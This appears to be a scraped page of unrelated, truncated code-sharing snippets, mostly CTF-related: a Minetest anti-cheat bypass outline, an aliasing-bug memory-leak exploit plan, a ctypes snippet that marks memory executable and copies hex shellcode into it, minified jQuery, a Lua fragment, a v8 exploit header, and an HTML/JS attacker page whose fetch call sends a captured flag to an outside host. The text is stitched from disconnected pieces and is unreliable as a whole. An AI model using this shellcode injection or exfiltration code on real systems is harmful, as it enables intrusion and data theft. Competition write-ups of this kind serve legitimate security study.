300 point
Web
Andrew Fasano
This challenge can be solved by exploiting the time change from EDT to EST that will happen on Nov 6.
This challenge required that you write cheats for a minecraft clone to bypass a large wall | |
There are tons of ways to solve this, but here was the main idea. | |
- There was a function that would on the client side return if a player has certain privileges. | |
- Most of these were checked by the server as well, with the exception of fly and noclip (and speed walk to an extent) | |
o Also note, I didn't modify the server to ignore these, Minetest servers just do ¯\_(ツ)_/¯ | |
- You can patch this function to return true, and the client can now toggle these abilities. | |
However the binary had extra anti-cheat built in |
This challenge was a source only pwnable based on a aliasing bug with -O2. Also not all the source code was given. | |
Intended solution outline: | |
- In the source in assignVotes, a voter and a candidate can become aliased, and -02 optimization causes an incorrect return value. | |
o If the person is the same as the candidate, it sets the voteMessage to a constant string, which should change votesToGive as well, but the return is incorrect, so it instead returns the original votesToGive value. | |
o Then when going to print the error message, it instead tries print the votes (if it is > than the address of main) | |
o This will print what ever point is given, allowing memory to be leaked up to a null | |
- Now with an arbitrary read, we can dump the binary and reverse the missing code. | |
- We can also leak libc addresses and dump libc (or take it from some other challenge) |
from timeit import timeit | |
from ctypes import * | |
''' | |
libc = CDLL('libc.so.6') | |
libc.mprotect(0x400000,0x1000,7) | |
s = "e810000000303132333435363738394142434445465b803f007437c6065c48ffc6c6067848ffc68a074825ff00000048c1e8044801d88a00880648ffc68a074883e00f4801d88a00880648ffc648ffc7ebc4c3".decode('hex') | |
#s = "\xc3" | |
libc.memcpy(0x400000, c_char_p(s),len(s)) |
I hereby claim:
To claim this, I am signing this object:
301345b6e7e96c9d37137fbcab602685178e922c81e5da545c7958d9cd3315e9 |
/*! jQuery v3.4.1 | (c) JS Foundation and other contributors | jquery.org/license */ | |
!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],E=C.document,r=Object.getPrototypeOf,s=t.slice,g=t.concat,u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[o.call(e)]||"object":typeof e}var f="3.4.1",k=function(e, |
<iframe src="http://crackme.web.chal.csaw.io/" id="a"></iframe> | |
<script> | |
let i=0; | |
window.addEventListener("message", function(event) { | |
msg = event.data; | |
console.log("attacker got ",msg); | |
if (msg.id == 0) { | |
a.contentWindow.postMessage({type:'run', id: i++, from:'page'},'*'); | |
} else if (msg.id == 1) { | |
fetch("http://itszn.com/?flag="+msg.output); |
-- TODO: move util functions to common.lua | |
local charts = {} | |
local passed = false | |
local desw = 770 | |
local desh = 800 | |
local moveX = 0 | |
local moveY = 0 |
/* Plaid CTF 2018 v8 Exploit. Exploit begins around line 240 */ | |
/* ### Utils, thanks saelo ### */ | |
// | |
// Tiny module that provides big (64bit) integers. | |
// | |
// Copyright (c) 2016 Samuel Groß | |
// |